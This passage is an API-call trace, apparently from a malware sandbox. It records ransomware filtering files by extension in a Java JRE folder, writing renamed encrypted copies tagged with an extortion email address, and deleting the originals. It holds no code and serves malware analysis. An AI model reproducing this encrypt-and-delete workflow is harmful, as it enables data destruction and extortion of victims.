[0189.534] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0189.534] lstrlenW (lpString=".pdf") returned 4 [0189.534] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0189.534] lstrlenW (lpString=".xls") returned 4 [0189.534] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0189.534] lstrlenW (lpString=".xlsx") returned 5 [0189.534] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0189.534] lstrlenW (lpString=".ppt") returned 4 [0189.534] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0189.535] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.535] lstrlenW (lpString=".zip") returned 4 [0189.535] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0189.535] lstrlenW (lpString=".rar") returned 4 [0189.535] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0189.535] lstrlenW (lpString=".bz2") returned 4 [0189.535] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0189.535] lstrlenW (lpString=".7z") returned 3 [0189.535] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0189.535] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.535] lstrlenW (lpString=".dbf") returned 4 [0189.535] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0189.535] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.535] lstrlenW (lpString=".1cd") returned 4 [0189.535] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0189.535] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\bci.dll") returned 46 [0189.535] lstrlenW (lpString=".jpg") returned 4 [0189.535] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0189.535] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0189.535] lstrlenW (lpString="dt_shmem.dll") returned 12 [0189.535] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0189.536] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=29760) returned 1 [0189.536] CloseHandle (hObject=0x388) returned 1 [0189.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll")) returned 0x20 [0189.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0189.536] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0189.537] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.537] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.537] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0189.537] GetLastError () returned 0x0 [0189.537] ReadFile (in: hFile=0x388, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x7440, lpOverlapped=0x0) returned 1 [0190.616] WriteFile (in: hFile=0x360, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x7450, lpOverlapped=0x0) returned 1 [0190.735] ReadFile (in: hFile=0x388, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0190.735] WriteFile (in: hFile=0x360, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xec, lpOverlapped=0x0) returned 1 [0190.735] SetEndOfFile (hFile=0x360) returned 1 [0190.735] CloseHandle (hObject=0x360) returned 1 [0190.736] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.736] SetEndOfFile (hFile=0x388) returned 1 [0190.737] CloseHandle (hObject=0x388) returned 1 [0190.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0190.888] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll")) returned 1 [0190.889] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.889] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.889] lstrlenW (lpString=".doc") returned 4 [0190.889] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0190.889] lstrlenW (lpString=".docx") returned 5 [0190.889] lstrcmpiW (lpString1=".docx", lpString2="m.dll") returned -1 [0190.889] lstrlenW (lpString=".pdf") returned 4 [0190.889] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0190.889] lstrlenW (lpString=".xls") returned 4 [0190.889] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0190.889] lstrlenW (lpString=".xlsx") returned 5 [0190.889] lstrcmpiW (lpString1=".xlsx", lpString2="m.dll") returned -1 [0190.889] lstrlenW (lpString=".ppt") returned 4 [0190.889] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0190.889] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.889] lstrlenW (lpString=".zip") returned 4 [0190.889] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0190.889] lstrlenW (lpString=".rar") returned 4 [0190.889] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0190.889] lstrlenW (lpString=".bz2") returned 4 [0190.889] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0190.889] lstrlenW (lpString=".7z") returned 3 [0190.889] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0190.889] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.889] lstrlenW (lpString=".dbf") returned 4 [0190.890] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0190.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.890] lstrlenW (lpString=".1cd") returned 4 [0190.890] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0190.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.890] lstrlenW (lpString=".jpg") returned 4 [0190.890] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.890] lstrlenW (lpString=".doc") returned 4 [0190.890] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString=".docx") returned 5 [0190.890] lstrcmpiW (lpString1=".docx", lpString2="m.dll") returned -1 [0190.890] lstrlenW (lpString=".pdf") returned 4 [0190.890] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString=".xls") returned 4 [0190.890] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString=".xlsx") returned 5 [0190.890] lstrcmpiW (lpString1=".xlsx", lpString2="m.dll") returned -1 [0190.890] lstrlenW (lpString=".ppt") returned 4 [0190.890] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.890] lstrlenW (lpString=".zip") returned 4 [0190.890] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString=".rar") returned 4 [0190.890] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0190.890] lstrlenW (lpString=".bz2") returned 4 [0190.890] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0190.890] lstrlenW (lpString=".7z") returned 3 [0190.891] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0190.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.891] lstrlenW (lpString=".dbf") returned 4 [0190.891] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0190.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.891] lstrlenW (lpString=".1cd") returned 4 [0190.891] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0190.891] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll") returned 51 [0190.891] lstrlenW (lpString=".jpg") returned 4 [0190.891] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0190.891] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0190.891] lstrlenW (lpString="eula.dll") returned 8 [0190.892] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0190.892] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=136256) returned 1 [0190.892] CloseHandle (hObject=0x3a8) returned 1 [0190.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll")) returned 0x20 [0190.892] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0190.892] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0190.892] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.893] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.893] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0190.893] GetLastError () returned 0x0 [0190.893] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x21440, lpOverlapped=0x0) returned 1 [0194.435] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x21450, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x21450, lpOverlapped=0x0) returned 1 [0196.323] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.323] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.323] SetEndOfFile (hFile=0x35c) returned 1 [0196.323] CloseHandle (hObject=0x35c) returned 1 [0196.323] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.323] SetEndOfFile (hFile=0x3a8) returned 1 [0196.327] CloseHandle (hObject=0x3a8) returned 1 [0196.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.327] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll")) returned 1 [0196.327] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.327] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.327] lstrlenW (lpString=".doc") returned 4 [0196.327] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.327] lstrlenW (lpString=".docx") returned 5 [0196.328] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0196.328] lstrlenW (lpString=".pdf") returned 4 [0196.328] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.328] lstrlenW (lpString=".xls") returned 4 [0196.328] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.328] lstrlenW (lpString=".xlsx") returned 5 [0196.328] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0196.328] lstrlenW (lpString=".ppt") returned 4 [0196.328] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.328] lstrlenW (lpString=".zip") returned 4 [0196.328] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.328] lstrlenW (lpString=".rar") returned 4 [0196.328] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.328] lstrlenW (lpString=".bz2") returned 4 [0196.328] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.328] lstrlenW (lpString=".7z") returned 3 [0196.328] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.328] lstrlenW (lpString=".dbf") returned 4 [0196.328] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.328] lstrlenW (lpString=".1cd") returned 4 [0196.328] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.328] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.328] lstrlenW (lpString=".jpg") returned 4 [0196.328] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.329] lstrlenW (lpString=".doc") returned 4 [0196.329] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString=".docx") returned 5 [0196.329] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0196.329] lstrlenW (lpString=".pdf") returned 4 [0196.329] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString=".xls") returned 4 [0196.329] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString=".xlsx") returned 5 [0196.329] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0196.329] lstrlenW (lpString=".ppt") returned 4 [0196.329] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.329] lstrlenW (lpString=".zip") returned 4 [0196.329] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString=".rar") returned 4 [0196.329] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.329] lstrlenW (lpString=".bz2") returned 4 [0196.329] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.329] lstrlenW (lpString=".7z") returned 3 [0196.329] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.329] lstrlenW (lpString=".dbf") returned 4 [0196.329] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.329] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.330] lstrlenW (lpString=".1cd") returned 4 [0196.330] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.330] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll") returned 47 [0196.330] lstrlenW (lpString=".jpg") returned 4 [0196.330] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.330] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.330] lstrlenW (lpString="instrument.dll") returned 14 [0196.330] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.330] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=123456) returned 1 [0196.330] CloseHandle (hObject=0x3a8) returned 1 [0196.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll")) returned 0x20 [0196.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.331] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0196.331] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.331] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.331] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0196.332] GetLastError () returned 0x0 [0196.332] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x1e240, lpOverlapped=0x0) returned 1 [0196.388] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x1e250, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x1e250, lpOverlapped=0x0) returned 1 [0196.390] ReadFile (in: hFile=0x3a8, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.390] WriteFile (in: hFile=0x35c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf0, lpOverlapped=0x0) returned 1 [0196.390] SetEndOfFile (hFile=0x35c) returned 1 [0196.391] CloseHandle (hObject=0x35c) returned 1 [0196.391] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.391] SetEndOfFile (hFile=0x3a8) returned 1 [0196.392] CloseHandle (hObject=0x3a8) returned 1 [0196.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.392] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\instrument.dll")) returned 1 [0196.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.393] lstrlenW (lpString=".doc") returned 4 [0196.393] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.393] lstrlenW (lpString=".docx") returned 5 [0196.393] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0196.393] lstrlenW (lpString=".pdf") returned 4 [0196.393] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.393] lstrlenW (lpString=".xls") returned 4 [0196.393] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.393] lstrlenW (lpString=".xlsx") returned 5 [0196.393] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0196.393] lstrlenW (lpString=".ppt") returned 4 [0196.393] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.393] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.393] lstrlenW (lpString=".zip") returned 4 [0196.393] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.393] lstrlenW (lpString=".rar") returned 4 [0196.393] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.394] lstrlenW (lpString=".bz2") returned 4 [0196.394] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.394] lstrlenW (lpString=".7z") returned 3 [0196.394] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.394] lstrlenW (lpString=".dbf") returned 4 [0196.394] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.394] lstrlenW (lpString=".1cd") returned 4 [0196.394] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.394] lstrlenW (lpString=".jpg") returned 4 [0196.394] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.394] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.394] lstrlenW (lpString=".doc") returned 4 [0196.394] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.394] lstrlenW (lpString=".docx") returned 5 [0196.394] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0196.394] lstrlenW (lpString=".pdf") returned 4 [0196.394] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.394] lstrlenW (lpString=".xls") returned 4 [0196.394] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.394] lstrlenW (lpString=".xlsx") returned 5 [0196.394] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0196.394] lstrlenW (lpString=".ppt") returned 4 [0196.394] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.395] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.395] lstrlenW (lpString=".zip") returned 4 [0196.395] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.395] lstrlenW (lpString=".rar") returned 4 [0196.395] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.395] lstrlenW (lpString=".bz2") returned 4 [0196.395] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.395] lstrlenW (lpString=".7z") returned 3 [0196.395] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.395] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.395] lstrlenW (lpString=".dbf") returned 4 [0196.395] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.395] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.395] lstrlenW (lpString=".1cd") returned 4 [0196.395] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.395] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\instrument.dll") returned 53 [0196.395] lstrlenW (lpString=".jpg") returned 4 [0196.395] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.395] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.395] lstrlenW 